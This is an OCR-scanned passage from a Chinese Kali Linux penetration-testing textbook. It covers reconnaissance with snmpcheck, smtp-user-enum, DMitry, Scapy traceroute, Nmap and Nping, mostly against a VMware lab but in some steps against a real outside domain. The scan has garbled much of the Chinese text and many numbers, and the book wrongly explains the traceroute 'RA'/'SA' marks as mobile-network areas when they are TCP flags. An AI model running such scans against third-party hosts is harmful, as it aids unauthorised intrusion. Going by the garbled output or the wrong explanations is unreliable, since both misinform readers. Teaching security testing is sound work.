Device id m 
Device type : Fixed Disk 
Filesystem type : NTFS 
Device units : 4096 
Memory size : 9.8G 
Memory used : 79M 
Memory free :9.7G 
6331 
Device id :4 
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Device type : Fixed Disk 
Filesystem type : NTFS 
Device units : 4096 
Memory size : 9.8G 
Memory used : 79M 
Memory free :9.7G 


该 部 分 显示 了 系统 中 所 有 人 磁盘。 由 于 篇 幅 的 原因 ， 这 里 只 贴 了 A 和 C 盘 的 存储 信息 。 
这 里 以 C 盘 为 例 ， 介 绍 一 下 输出 的 信息 ， 包 括 设 备 类 型 、 文 件 系 统 类 型 、 罕 间 大 小 、 己 用 
空间 大 小 和 剩余 空间 大 小 等 。 

(4) 获取 用 尸 账 尸 信息 。 结 东 如 下 所 未 : 


[*] User accounts 


Administrator 
Guest 


输出 的 信息 显示 了 该 系统 中 的 有 了 两 个 用 户 ， 分 别 是 Administrator 和 Guest. 
(5) 获取 进程 信息 ， 如 进程 ID、 进程 名 和 进程 类 型 等 。 结 果 如 下 所 示 : 


[*] Processes 


Total processes: 44 


Process type : 1 unknown, 2 operating system, 3 device driver, 4 application 
Process status: 1 running, 2 runnable, 3 not runnable, 4 invalid 
Process id Process name Process type Process status Process path 
1 System Idle Process 2 1 
1132 svchost.exe 4 1 
1276 spoolsv.exe 4 1 
1324 svchost.exe 4 1 
1416 taskhost.exe 4 1 


输出 信息 的 第 一 行 表示 该 系统 中 共有 44 个 进程 。 由 于 篇 幅 的 原因 , 这 里 只 列 出 了 前 几 
个 运行 的 进程 。 第 二 行 指定 了 进程 类 型 : 1 表示 不 知名 ; 2 表示 操作 系统 ; 3 表示 设备 驱动 ; 
4 表示 应 用 程序 。 第 三 行 指 定 了 进程 的 状态 : 1 表示 正在 运行 ，2 表示 可 以 运行 ，3 表示 不 
能 运行 ;4 表示 无 效 的 。 第 四 行 的 内 容 是 以 列 的 形式 显示 : 第 一 列表 示 进 程 了 站; 第 二 列表 
示 进 程 名 ; 第 三 列表 示 进 程 状态 ， 第 四 列表 示 进 程 路 径 。 

(6) 获取 网 络 信息 ， 如 TTL 值 、TCP 段 和 数据 元 。 结 果 如 下 所 示 : 

[*] Network information 


IP forwarding enabled : no #2 GIA IP 转发 
Default TTL : 128 AER TTL 值 
TCP segments received : 19092 # 收 到 TCP EE 
TCP segments sent : 5964 #AIK TCP FR 
TCP segments retrans. :0 # 重 发 TCP 段 
Input datagrams : 37878 # 输 入 数据 元 
Delivered datagrams : 38486 # 传 输 的 数据 元 
Output datagrams : 16505 # 输 出 数据 元 


以 上 信息 显示 了 该 目标 系统 中 网 络 的 相关 信息 ， 如 默认 TIL 值 、 收 到 TCP 段 、 发 送 
TCP RAER TO RÆ, 


e 77» 


第 2 篇 ”信息 的 收集 及 利用 


70) 获取 网 络 接口 信息 ， 如 接口 状态 、 速 率 、 了 王 地 址 和 子 网 掩 码 等 。 结 果 如 下 所 示 : 
[*] Network interfaces 


Interface : [up ] Software Loopback Interface 1 

Interface Speed : 1073.741824 Mbps # 接 口 速 率 

IP Address 2 #IP 地 址 
Netmask : 255.0.0.0 HF eau 
MTU : 1500 # 最 大 传输 单元 


以 上 信息 中 显示 了 loopback 接口 的 相关 信息 。 包 括 它 的 速率 、IP 地 址 、 子 网 掩 码 和 最 
大 传输 单元 。 

(8) 获取 路 由 信息 ， 如 目标 地 址 、 下 一 跳 地 址 、 子 网 掩 码 和 路 径 长 上 度 值 。 结 果 如 下 所 
7h: 


[*] Routing information 


Destination Next Hop Mask Metric 
0.0.0.0 192.168.41.2 0.0.0.0 10 
127.0.0.1 127.0.0.1 2097909 499 293 306 
1244235 2552233 127.0.0.1 239439927953 2353 306 
192.168.41.0 192.168.41.138 299 2595 285.0 266 
192.168.41.138 192.168.41.138 205.205 299 755 266 
192.168.41.255 192.168.41.138 2m 43374213 266 
224.0.0.0 127.0.0.1 240.0.0.0 306 


以 上 信息 表示 目标 系统 的 一 个 路 由 表 信 息 。 该 路 由 表 包 括 目的 地 址 、 下 一 跳 地 址 、 子 
网 掩 码 及 路 径 长 度 值 。 

C9) 获取 网 络 服务 信息 , 如 分 布 式 组 件 对 象 模型 服务 DHCP Pig A DNS 客 忆 站 等 。 
结 末 如 下 所 示 : 


[*] Network services 


Application Experience 
Background Intelligent Transfer Service 
Base Filtering Engine 
COM+ Event System 
COM+ System Application 
Computer Browser 
Cryptographic Services 
DCOM Server Process Launcher 
DHCP Client 
DNS Client 


以 上 信息 显示 了 目标 主机 中 所 安装 的 服务 。 由 于 篇 幅 的 原因 ， 只 列 出 了 一 少 部 分 服务 。 
(10) 获取 监听 的 TCP 端口 ， 如 监听 的 TCP 端口 号 有 135. 495149513 和 139 等 。 结 
果 如 下 所 示 : 


[*] Listening TCP ports and connections 
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Local Address Port Remote Address Port State 
0.0.0.0 1259 0.0.0.0 - Listening 
0.0.0.0 49152 0.0.0.0 - Listening 
0.0.0.0 49153 0.0.0.0 - Listening 
0.0.0.0 49154 0.0.0.0 - Listening 
0.0.0.0 49155 0.0.0.0 - Listening 
0.0.0.0 49156 0.0.0.0 - Listening 
0.0.0.0 49159 0.0.0.0 - Listening 

192.168.41.138 139 0.0.0.0 - Listening 
192.168.41.138 49241 192.168.41.1 139 Time wait 


以 上 信息 表示 两 台 主 机 建立 TCP 连接 后 的 信息 。 FRA Hoh. ZR EL. REEL 
地 址 、 远 程 主 机 端口 及 连接 状态 。 
(11) 获取 监听 UDP 端口 信息 ， 如 监听 的 UDP 端口 有 123. 161. 4500. 500 和 5355 
等 。 结 果 如 下 所 示 : 
[*] Listening UDP ports 


Local Address Port 
0.0.0.0 123 

0.0.0.0 161 

0.0.0.0 4500 

0.0.0.0 500 

0.0.0.0 a 

127 004 1900 
127.0.0.1 51030 
192.168.41.138 137 
192.168.41.138 138 
192.168.41.138 1900 


以 上 信息 表示 目标 主机 中 已 开局 的 UDP vig H5. 
(12) 获取 软件 组 件 信 息 ， 如 Visual C++ 2008, 显示 结果 如 下 所 示 ; 


[*] Software components 


1. Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 


以 上 信息 表示 该 主机 中 安装 了 Visual C++ 2008 类 库 。 
(13) 获取 Web 服务 信息 ， 如 发 送 的 字 节 数 、 文 件数 和 当前 匿名 用 户 等 。 结 果 如 下 所 


ral 


[*] Web server information 

Total bytes sent low word : - 
Total bytes received low word : - 
Total files sent : - 
Current anonymous users D- 
Current non anonymous users D- 
Total anonymous users : - 
Total non anonymous Users = 


[x] Enumerated 192.168.41.138 in 0.64 seconds 
Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmpcheck line 230. 


以 上 信息 显示 了 关于 Web 服务 的 信息 。 最 后 显示 了 枚 举 主机 192.168.41.138 共用 的 时 间 。 
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41.5 SMTP 枚 举 工 具 smtp-user-enum 


smtp-user-enum 是 针对 SMTP IRZ 28 [0] 25 端口 ， 进 行 用 户 名 枚 举 的 工具 ,用 以 探测 服 
务 右 已 存在 的 邮箱 账户 。 在 SMTP 服务 上 启动 用 户 的 SMTP 枚 举 。 执 行 命令 如 下 所 示 : 


root@kali:~# smtp-user-enum -M VRFY -U /tmp/users.txt -t 192.168.41.138 
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) 


| Scan Information | 


Mode .---------------- » .. VRFY #SMTP 枚 举 使 用 的 模式 
Worker Processes... — 1... 5 # 运 行进 程 数 
Usernames file ........... /tmp/users.txt # 用 户 名 文件 
Target count ......... sn # 目 标 账户 数 
Username count ^... 2 # 用 户 名 账号 数 
Target TCP port nn 25 # 目 标 TCP 端口 
Query timeout .i 0 an 5 secs # 超 时 时 间 
Target domain ............ # 目 标 域名 
THHHHHHHE Scan started at Sat Apr 19 16:07:04 2014 THEHHHHHHE # 扫 描 启动 时 间 
THHHHHHHE Scan completed at Sat Apr 19 16:07:05 2014 ?HHHHHHHHE # 扫 描 结 束 时 间 
0 results. 


2 queries in 1 seconds (2.0 queries / sec) 


输出 的 信息 显示 了 扫描 192.168.41.138 主机 的 详细 信息 ， 包 括 模式 、 运 行进 程 、 用 户 
名 文件 、 用 户 数 和 TCP 端口 等 。 


4.2 测试 网 A je, E 


aa iA Rd A Ye E P E IP. 地 址 或 域名 也 是 渗透 测试 的 一 个 重要 部 分 。 通 过 测试 网 络 范 围 内 
的 IP 地 址 或 域名 , 确定 是 否 有 人 入 侵 自 己 的 网 络 中 并 损害 系统 。 不 少 单位 选择 仅 对 局 部 IP 
基础 架构 进行 渗透 测试 , 但 从 现在 的 安全 形势 来 看 ， 只 有 对 整个 IT 基础 染 构 进行 测试 才 有 
意义 。 这 是 因为 在 通常 情况 下 ， 黑 客 只 要 在 一 个 领域 找到 漏洞 ， 束 可 以 利用 这 个 汤 洞 攻击 
男 外 一 个 领域 。 在 Kali 中 提供 了 DMitry 和 Scapy 工具 。 其 中 ，DMitry 工具 用 来 得 询 目 标 
网 络 中 IP 地 址 或 域名 信息 ;Scapy 工具 用 来 扫描 网 络 及 唱 探 数据 包 。 本 市 将 介绍 使 用 DMitry 
和 Scapy 工具 测试 网 络 范 围 。 


42.1 域名 查询 工具 DMitry 


DMitry 工具 是 用 来 查询 IP 或 域名 WHOIS 信息 的 。WHOIS 是 用 来 查询 域名 是 否 已 经 
被 注册 及 已 经 注册 域名 的 详细 信息 的 数据 库 〈 如 域名 所 有 人 和 域名 注册 商 ) 。 使 用 该 工具 
可 以 但 到 域名 的 注册 商 和 过 期 时 间 等 。 下 面 将 使 用 DMitry 工具 收集 rzchina.net 域 名 的 信息 。 
执行 命令 如 下 所 示 : 

root@kali:~# dmitry -wnpb rzchina.net 
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Deepmagic Information Gathering Tool 
"There be some deep magic going on" 
HostlP:180.178.45.123 
HostName:rzchina.net 
Gathered Inic-whois information for rzchina.net 
Domain Name: RZCHINA.NET 
Registrar: BIZCN.COM, INC. 
Whois Server: whois.bizcn.com 
Referral URL: http://www.bizcn.com 
Name Server: DNS1.BIZMOTO.COM 
Name Server: DNS2.BIZMOTO.COM 
Status: clientDeleteProhibited 
Status: clientTransferProhibited 
Updated Date: 18-apr-2013 


Retrieving Netcraft.com information for rzchina.net 
Netcraft.com Information gathered 


Gathered TCP Port information for 180.178.45.123 


Port State 
21/tcp open 
>> 220 Welcome 
22/tcp open 
>> SSH-2.0-OpenSSH_4.3 
25/tcp open 
>> 220 vhost/8.myverydz.com ESMTP Postfix 
80/tcp open 
110/tcp open 


>> +OK Hello there. 
Portscan Finished: Scanned 150 ports, 135 ports were in state closed 
All scans completed, exiting 


输出 的 信息 显示 了 rzchina.net 域名 的 IP htt. WHOIS 信息 及 开放 的 端口 号 等 。 执 行 
以 上 命令 后 输出 的 信息 很 多 ， 但 是 由 于 篇 幅 的 原因 ， 部 分 内 容 使 用 省 略 写 〈.….) TRF 

虽然 使 用 DMitry 工具 可 以 查看 到 IP 或 域名 信息 ， 但 还 是 不 能 判断 出 这 个 网 络 和 范围。 
因为 一 般 的 路 由 器 和 防火 场 等 并 不 文 持 IP 地 址 范围 的 方式 ， 所 以 工作 中 经 常 要 把 IP 地 址 
FE PR A RAS AFR SK. CIDR 格式 和 思科 反问 子 网 掩 码 格式 守 。 在 Linux 中 ，netmask T. 
具 可 以 在 IP WWE F, CIDR 和 Cisco 等 格式 中 互相 转换 ， 并 旦 提供 了 IP 地址 的 点 
分 十 进 制 、 十 六 进 制 \ 八 进 制 和 二 进 制 之 间 的 互相 转换 ,使 用 netmask 工具 将 域名 rzchina.net 
转换 成 标准 的 子 网 撼 码 格式 。 执 行 命令 如 下 所 示 : 


root@kali:~# netmask -s rzchina.net 
180.178.45.123/255.255.255.255 


输出 的 信息 显示 了 rzchina.net 域名 的 IP 地 址 和 子 网 掩 码 值 。 
4.2.2 ” 跟 中 路 由 工具 Scapy 

Scapy 是 一 和 款 强 大 的 交互 式 数 据 包 处 理工 具 、 数 据 包 生成 问 、 网 络 扫描 器 、 网 络 发 现 
工具 和 包 咒 探 工 具 。 它 提供 多 种 类 别 的 交互 式 生 成 数据 包 或 数据 包 集 合 、 对 数据 包 进 行 操 
作 、 发 送 数 据 包 、 包 咒 探 、 应 答 和 反馈 匹配 等 功能 。 下 面 将 介绍 Scapy 工具 的 使 用 。 
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使 用 Scapy 实现 多 行 并行 跟 踊 路 由 功能 。 具 体操 作 步 怠 如 下 所 示 。 
(1) 启动 Scapy 工具 。 执 行 命令 如 下 所 示 。 


root@kali:~# scapy 

INFO: Can't import python gnuplot wrapper . Won't be able to plot. 
WARNING: No route found for IPv6 destination :: (no default route?) 
Welcome to Scapy (2.2.0) 


>>> 

看 到 >>> 提 示 符 ， 表 示 scapy 命令 登录 成 功 。 

(2) 使 用 sr0 函 数 实现 发 送 和 接收 数据 包 。 执 行 命令 如 下 所 示 : 
>>> ans,unans=sr(IP(dst="www.rzchina.net/30" ttl=(1,6))/TCP()) 

Begin emission: 

.x***Finished to send 24 packets. 


TEE HHH II O  ZCtr*C £&€IE 
Received 70 packets, got 19 answers, remaining 5 packets 


执行 以 上 命令 后 ， 会 目 动 与 www.rzchina.net 建立 连接 。 执 行 几 分 钟 后 ， 使 用 Ctrl+C 
终止 接收 数据 包 。 从 输出 的 信息 中 可 以 看 到 收 到 70 个 数据 包 ， 得 到 19 个 啊 应 包 及 保留 了 
S7 BL. 

(3) 以 表 的 形式 查看 数据 包 发 送 情 况 。 执 行 命令 如 下 所 示 : 


>>> ans.make_table(lambda(s,r):(s.dst,s.ttl,r.src)) 


执行 以 上 命令 后 ， 输 出 如 下 所 示 的 信息 : 


180.178.45.120 180.178.45.121 180.178.45.122 180.178.45.123 
1 192.168.41.2 192.168.41.2 192.168.41.2 192.168.41.2 


2 180.178.45.120 - 180.178.45.122 180.178.45.123 
3 180.178.45.120 - 180.178.45.122 180.178.45.123 
4 180.178.45.120 - 180.178.45.122 180.178.45.123 
5 180.178.45.120 - 180.178.45.122 180.178.45.123 
6 180.178.45.120 - 180.178.45.122 180.178.45.123 


得 出 的 信息 显示 了 该 网 络 中 的 所 有 IP 地 址 。 
(4) 使 用 scapy 得 看 TCP 路 由 跟踪 信息 。 执 行 命令 如 下 所 示 : 


>>> 
res,unans=traceroute(["Wwww.google.com","www.kali.org","www.rzchina.net"],dport=[80 443], maxt 
tl-20,retry--2) 

Begin emission: 

Jaooo kkk kkk kk Finished to send 120 packets. 
aaoo oo kkk kkk Begin emission: 

* Finished to send 39 packets. 

Begin emission: 

Finished to send 38 packets. 

Begin emission: 

Finished to send 38 packets. 

Received 84 packets, got 82 answers, remaining 38 packets 


173.194.127.179:tcp443 173.194.127.179:tcp80 180.178.45.123:tcp443 
180.178.45.123:tcp80 198.58.119.164:tcp443 198.58.119.164:tcp80 
1 192.168.41.2 11 192.168.41.2 11 192.168.41.2 Lu 
192.168.41.2 11 192.168.41.2 11 192.168.41.2 11 
2 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
3 E - 180.178.45.123 RA 
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180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
4 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
9 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
6 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
rj - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
8 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
9 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
10 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
11 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
12 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
13 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
14 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
15 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
16 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
17 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
18 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
19 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 
20 - - 180.178.45.123 RA 
180.178.45.123 SA 198.58.119.164 RA 198.58.119.164 SA 


输出 的 信息 ， 显 示 了 与 www.google.com, www.kali.org. www.rzchina.net 三 个 网 站 连 
接 后 所 经 过 的 地 址 。 输 出 信息 中 的 RA 表示 路 由 区 ，SA 表示 服务 区 。 其 中 路 由 区 是 指 当前 
系统 中 移动 台 当 前 的 位 置 。RA (Routing Area) 的 标识 从 是 RAI, RA 是 包含 在 LA 内 的 。 
服务 区 是 指 移动 台 可 获得 服务 的 区 域 ， 即 不 同 通信 网 用 户 无 需 知道 移动 台 的 实际 位 置 ， 而 
可 与 之 通信 的 区 域 。 

(5) 使 用 res.graph() 函 数 以 图 的 形式 显示 路 由 跟 踩 结 


>>> res.graph() 


执行 以 上 命令 后 ， 将 显示 如 图 4.1 所 示 的 界面 。 


HRN PAT ATS UI FETZ: 


ImageMagick: - 


192.168.41.2 


45753 
[NETSEC-HK Unit 1205-1207, | 


路 由 跟踪 图 


图 4.1 
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如 朵 要 想 保 存 该 图 ， 执 行 如 下 所 示 的 命令 : 
>>> res.graph(target=">/tmp/graph.svg") 


执行 以 上 命令 后 ， 图 4.1 中 的 信息 将 会 保存 到 /tmp/graph.svg 文件 中 。 此 时 不 会 有 任何 
信息 输出 。 
(6) 退出 scapy 程序 ， 执 行 命令 如 下 所 示 : 


>>> exit() 


执行 以 上 命令 后 ，scapy 程序 将 退出 。 还 可 以 按 下 Ctrl+D 组 合 键 退 出 scapy 程序 。 
43 ”识别 活跃 的 主机 


答 试 渗透 测试 之 前 ， 必 须 先 识别 在 这 个 目标 网 络 内 活跃 的 主机 。 在 一 个 目标 网 络 内 ， 
最 简单 的 方法 将 是 执行 ping 命令 。 当 然 ， 它 可 能 被 一 个 主机 拒绝 ， 也 可 能 被 接收 。 本 节 将 
介绍 使 用 Nmap 工具 识别 活跃 的 主机 。 


4.3.1 网 络 映射 器 工具 Nmap 


Nmap 是 一 个 免费 开放 的 网 络 扫描 和 噢 探 工具 包 , 也 叫 网 络 映 射 器 (Network Mapper) 。 
该 工具 其 基本 功能 有 三 个 ， 一 是 探测 一 组 主机 是 否 在线 ; 其 次 是 扫描 主机 端口 ， 嗅 探 所 提 
供 的 网 络 服务 ， 三 是 可 以 推断 主机 所 用 的 操作 系统 。 通 常 ， 用 户 利 用 Nmap 来 进行 网 络 系 
统 安全 的 评估 ， 而 黑客 则 用 于 扫描 网 络 。 例 如 ， 通 过 问 远程 主机 发 送 探测 数据 包 ， 获 取 主 
机 的 响应 ， 并 根据 主机 的 端口 开放 情况 得 到 网 络 的 安全 状态 。 从 中 寻找 存在 漏洞 的 目标 主 
机 ， 从 而 实施 下 一 步 的 攻击 。 

Nmap 使 用 TCP/IP 协议 栈 指纹 准确 地 判断 目标 主机 的 操作 系统 类 型 。 首 先 ，Nmap 通 
过 对 目标 主机 进行 端口 扫描 ， 找 出 有 哪些 端口 正在 目标 主机 上 监听 。 当 侦 测 到 目标 主机 上 
有 多 于 一 个 开放 的 TCP 端口 、 一 个 关闭 的 TCP 端口 和 一 个 关闭 的 UDP nOA, Nmap 的 
探测 能 力 是 最 好 的 。Nmap 工具 的 工作 原理 如 表 4-1 所 示 。 


表 4-1 Nmap 工 作 原 理 


A 试 mR 
= 发 送 TCP 数据 包 (Flas=SYN) 到 开放 的 TCP 端口 上 
= 发 送 一 个 空 的 TCP 数据 包 到 开放 的 TCP 端口 上 
T3 发 送 TCP 数据 包 (Flag=SYN、URG、PSH 和 FIN) 到 开放 的 TCP 端口 上 
= 发 送 TCP 数据 包 (Flag=ACK) 到 开放 的 TCP 端口 上 
= 发 送 TCP 数据 包 (Flag=SYN) 到 关闭 的 TCP 端口 上 
= 发 送 TCP 数据 包 (Flag=ACK) 到 开放 的 TCP 端口 上 
17 发 送 TCP 数据 包 CFlag-URG, PSH Ail FIN) 到 关闭 的 TCP 端口 上 


Nmap 对 目标 主机 进行 一 系列 测试 ， 如 表 4-1 所 示 。 利 用 得 出 的 测试 结果 建立 相应 目 
标 主 机 的 Nmap 指纹 。 最 后 ， 将 此 Nmap 指纹 与 指纹 库 中 指纹 进行 查找 匹配 ， 从 而 得 出 目 
标 主机 的 操作 系统 类 型 。 
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Nmap 主要 扫 摘 类 型 如 表 4-2 所 示 。 
表 4-2 Nmap 主 要 扫描 类 型 


Ping 扫描 端口 扫描 
TCP SYN 扫描 UDP 扫描 
操作 系统 识别 et mic Fs Si 


4.3.2 使 用 Nmap 识别 活跃 主机 


上 一 小 贡 介 绍 了 Nmap 工具 概念 及 功能 。 现 在 束 使 用 该 工具 ， 测 试 一 个 网 络 中 活跃 的 


主机 。 使 用 方法 如 下 所 示 。 


使 用 Nmap 得 看 一 个 主机 是 否 在 线 。 执 行 命 令 如 下 所 示 : 


root@kali:~# nmap -SP 192.168.41.136 

Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-21 17:54 CST 
Nmap scan report for www.benet.com (192.168.41.136) 

Host is up (0.00028s latency). 

MAC Address: 00:0C:29:31:02:17 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds 


从 输出 的 信息 中 可 以 看 到 192.168.41.136 主机 的 域名 、 主 机 在 线 和 MAC 地 址 等 。 
用 户 也 可 以 使 用 Nping (Nmap 套 具 ) 奏 看 ， 能 够 获取 更 多 详细 信息 。 执 行 命令 如 下 


所 示 : 


间 、 


root@kali:~# nping --echo-client "public" echo.nmap.org 

Starting Nping 0.6.40 ( http://nmap.org/nping ) at 2014-04-21 17:53 CST 

SENT (1.6030s) ICMP [192.168.411.234 > 74.207.244.221 Echo request (type=8/code=0) 
id=45896 seq-1] IP [ttl=64 id=1270 iplen=28 ] 

RCVD (1.7971s) ICMP [74.207.244.221 > 192.168.41.234 Echo reply (type=0/code=0) id=45896 
seq-1] IP [ttl=128 id=64157 iplen=28 ] 

SENT (2.6047s) ICMP [192.168.41.234 » 74.207.244.221 Echo request (type-8/code-0) 
id=45896 seq-2] IP [ttl-64 id=1270 iplen-28 ] 

RCVD (2.6149s) ICMP [74.207.244.221 > 192.168.41.234 Echo reply (type=0/code=0) id=45896 
seq=1] IP [ttl=128 id=64159 iplen=28 ] 

SENT (3.6289s) ICMP [192.168.41.234 > 74.207.244.221 Echo request (type=8/code=0) 
id=45896 seq=3] IP [ttl-64 id=1270 iplen=28 ] 

RCVD (3.6322s) ICMP [74.207.244.221 > 192.168.41.234 Echo reply (type=0/code=0) id=45896 
seq-1] IP [ttl=128 id=64161 iplen=28 ] 

SENT (4.6429s) ICMP [192.168.41.234 > 74.207.244.221 Echo request (type=8/code=0) 
id=45896 seq=4] IP [ttl=64 id=1270 iplen=28 ] 

RCVD (4.6435s) ICMP [74.207.244.221 > 192.168.41.234 Echo reply (type=0/code=0) id=45896 
seq-1] IP [ttl=128 id=64163 iplen=28 ] 

SENT (5.6454s) ICMP [192.168.41.234 > 74.207.244.221 Echo request (type=8/code=0) 
id=45896 seq=5] IP [ttl=64 id=1270 iplen=28 ] 

RCVD (5.6455s) ICMP [74.207.244.221 > 192.168.41.234 Echo reply (type=0/code=0) id=45896 
seq=1] IP [ttl=128 id=64164 iplen=28 ] 

Max rtt: 193.736ms | Min rtt: 0.042ms | Avg rtt: 70.512ms 

Raw packets sent: 5 (140B) | Revd: 11 (506B) | Lost: 0 (0.00%)| Echoed: 0 (OB) 

Nping done: 1 IP address pinged in 6.72 seconds 


输出 的 信息 显示 了 与 echo.nmap.org 网 站 连接 时 数据 的 发 送 情况 ， 如 发 送 数 据 包 的 时 
接收 时 间 、TTL 值 和 往返 时 间 等 。 
用 户 也 可 以 发 送 一 些 十 六 进 制 数据 到 指定 的 端口 ， 如 下 所 未 : 
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root@kali:~# nping -tcp -p 445 -data AF56A43D 192.168.41.136 

Starting Nping 0.6.40 ( http://nmap.org/nping ) at 2014-04-21 17:58 CST 

SENT (0.0605s) TCP 192.168.41.234:14647 > 192.168.41.136:445 S ttl=64 id=54933 iplen-44 
seq-3255055/82 win=1480 

RCVD (0.0610s) TCP 192.168.41.136:445 > 192.168.41.234:14647 RA ttl=64 id=0 iplen=40 
seq=0 win=0 

SENT (1.0617s) TCP 192.168.41.234:14647 > 192.168.41.136:445 S ttl=64 id=54933 iplen=44 
seq-3255055782 win=1480 

RCVD (1.0620s) TCP 192.168.41.136:445 > 192.168.41.234:14647 RA ttl=64 id=0 iplen=40 
seq=0 win=0 

SENT (2.0642s) TCP 192.168.41.234:14647 > 192.168.41.136:445 S ttl=64 id=54933 iplen=44 
seq-3255055782 win=1480 

RCVD (2.0645s) TCP 192.168.41.136:445 > 192.168.41.234:14647 RA ttl=64 id=0 iplen=40 
seq=0 win=0 

SENT (3.0667s) TCP 192.168.41.234:14647 > 192.168.41.136:445 S ttl=64 id=54933 iplen=44 
seq=3255055782 win=1480 

RCVD (3.0675s) TCP 192.168.41.136:445 > 192.168.41.234:14647 RA ttl=64 Id=0 iplen=40 
seq=0 win=0 

SENT (4.0683s) TCP 192.168.41.234:14647 > 192.168.41.136:445 S ttl=64 id=54933 iplen=44 
seq=3255055782 win=1480 

RCVD (4.0685s) TCP 192.168.41.136:445 > 192.168.41.234:14647 RA ttl=64 id=0 iplen=40 
seq=0 win=0 

Max rtt: 0.334ms | Min rtt: 0.136ms | Avg rtt: 0.217ms 

Raw packets sent: 5 (220B) | Revd: 5 (230B) | Lost: 0 (0.00%) 

Nping done: 1 IP address pinged in 4.13 seconds 


输出 的 信息 显示 了 192.168.41.234 与 目标 系统 192.168.41.136 之 间 TCP 传输 过 程 。 通 
过 发 送 数 据 包 到 指定 端口 模拟 出 一 些 常见 的 网 络 层 攻击 ， 以 验证 目标 系统 对 这 些 测试 的 防 
御 情 况 。 


44 ”查看 打开 的 端口 


对 一 个 大 范围 的 网 络 或 活跃 的 主机 进行 渗透 测试 ， 必 须要 了 解 这 些 主机 上 上 所 打开 的 端 
口号 。 在 Kali Linux 中 默认 提供 了 Nmap 和 Zenmap 两 个 扫描 端口 工具 。 为 了 访问 目标 系 
统 中 打开 的 TCP 和 UDP vig, AKINA Nmap 和 Zenmap 工具 的 使 用 。 


4.4.1 TCP 亲口 扫描 工具 Nmap 


使 用 Nmap 工具 查看 目标 主机 192.168.41.136 上 开放 的 端口 号 。 执 行 命令 如 下 所 示 : 


root@kali:~# nmap 192.168.41.136 

Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-19 16:21 CST 
Nmap scan report for www.benet.com (192.168.41.136) 

Host is up (0.00022s latency). 

Not shown: 996 closed ports 


PORT STATE SERVICE 
21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 
25/tcp opne smtp 

53/tcp open domain 
80/tcp open http 

111/tcp open rpcbind 
139/tcp open netbios-ssn 
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445/tep open microsoft-ds 
512/tcp open exec 
513/tcp open login 
514/tcp open shell 
1099/tcp open rmiregistry 
1524/tcp open ingreslock 
2049/tcp open nfs 
2121/tcp open ccproxy-ftp 
3306/tcp open mysql 
5432/tcp open postgresql 
5900/tcp open vnc 
6000/tcp open X11 
666//tcp open irc 
8009/tcp open ajp13 
8180/tcp open unknown 


MAC Address: 00:0C:29:31:02:17 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds 


输出 的 信息 显示 了 主机 192.168.41.136 上 开放 的 所 有 端口 ， 如 22. 53. 80 和 111 等 。 

1. 指定 扫描 端口 范围 

如 果 目 标 主机 上 打开 的 端口 较 多 时 ， 用 户 查 看 起 来 可 能 有 点 困难 。 这 时 候 用 户 可 以 使 用 
Nmap 指定 扫描 的 端口 范围 ， 如 指定 扫描 端口 号 在 1 一 1000 之 间 的 端口 号 ， 执 行 命令 如 下 所 示 : 


root@kali:~# nmap -p 1-1000 192.168.41.136 

Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-19 16:27 CST 
Nmap scan report for www.benet.com (192.168.41.136) 

Host is up (0.00020s latency). 

Not shown: 49 closed ports 


PORT STATE SERVICE 
21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 
25/tcp opne smtp 
53/tcp open domain 
80/tcp open http 
111/tcp open rpcbind 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
512/tcp open exec 
513/tcp open login 
514/tcp open shell 


MAC Address: 00:0C:29:31:02:17 (VMware) 
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds 


输出 的 信息 显示 了 主机 192.168.41.136 上 端口 在 1 一 1000 之 间 所 开放 的 端口 号 。 

2. 扫描 特定 端口 

Nmap 工具 还 可 以 指定 一 个 特定 问 口 号 来 扫描 。 

【实例 4-2】 使 用 Nmap 工具 指定 扫描 在 192.168.41.* 网 段 内 所 有 开启 TCP 端口 22 的 
主机 。 执 行 命令 如 下 所 示 : 

root@kali:~# nmap -p 22 192.168.41.* 


Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-21 09:44 CST 
Nmap scan report for 192.168.41.1 
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Hostis up (0.00029s latency). 

PORT STATE SERVICE 

22/tcp closed ssh 

MAC Address: 00:50:56:C0:00:08 (VMware) 


Nmap scan report for 192.168.41.2 

Host is up (0.00032s latency). 

PORT STATE SERVICE 

22/tcp closed ssh 

